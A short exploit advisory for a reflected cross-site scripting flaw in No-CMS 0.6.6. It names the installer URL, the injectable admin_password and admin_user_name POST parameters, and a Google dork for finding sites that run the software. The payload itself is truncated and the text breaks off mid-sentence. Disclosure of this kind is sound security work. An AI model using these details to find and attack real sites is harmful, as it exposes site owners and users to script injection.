####################################################################### # # Exploit Title: No-CMS 0.6.6 Cross site scripting # Date: 2014 18 March # Author: Dr.3v1l # Vendor Homepage: http://getnocms.com # Version : 0.6.6 # Tested on: Windows # Category: webapps # Google Dork: intext:"Powered by No-CMS" # ####################################################################### # # [+] Exploit : # # http:///No-CMS-master/No-CMS-master/index.php/installer/install # # URL encoded POST input parameters (admin_password , admin_user_name) was set to : # "> # The input is reflected inside